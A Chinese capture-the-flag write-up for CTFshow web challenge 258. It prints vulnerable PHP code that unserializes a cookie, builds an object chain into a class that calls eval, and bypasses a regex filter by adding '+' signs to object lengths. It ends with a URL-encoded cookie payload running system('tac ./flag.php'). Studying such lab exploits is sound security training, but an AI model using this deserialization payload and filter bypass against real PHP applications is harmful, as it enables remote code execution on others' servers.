CTFshow-Web入门-反序列化-258题

1、代码审计

<?php
error_reporting(0);
highlight_file(__FILE__);

class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;
    public $class = 'info';

    public function __construct(){
        $this->class=new info();
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
        $this->class->getInfo();
    }

}

class info{
    public $user='xxxxxx';
    public function getInfo(){
        return $this->user;
    }
}

class backDoor{
    public $code;
    public function getInfo(){
        eval($this->code);
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    if(!preg_match('/[oc]:\d+:/i', $_COOKIE['user'])){
        $user = unserialize($_COOKIE['user']);
    }
    $user->login($username,$password);
}

按照逻辑，我们需要：

• 更改变量$class的值，以及__construct()魔术方法中实例化的是backDoor类；
• 绕过正则表达式的匹配：/[oc]:\d+:/i 即：以 oc: 开头，: 结尾，中间有至少一个数字，不论大小写；
• username和password要一致

2、保留需要部分，构造链

<?php
class ctfShowUser{
    public $class = 'backDoor';

    public function __construct(){
        $this->class=new backDoor();
    }
}


class backDoor{
    public $code='system("tac ./flag.php");';
}

$a = serialize(new ctfShowUser());
echo $a . "\n";
$b = str_replace(':11', ':+11', $a);
$b = str_replace(':8', ':+8', $b);
echo $b . "\n";

echo urlencode($b);

payload：

url：?username=xxxxxx&password=xxxxxx

cookie： O%3A%2B11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22class%22%3BO%3A%2B8%3A%22backDoor%22%3A1%3A%7Bs%3A4%3A%22code%22%3Bs%3A25%3A%22system%28%22tac+.%2Fflag.php%22%29%3B%22%3B%7D%7D

成功拿到flag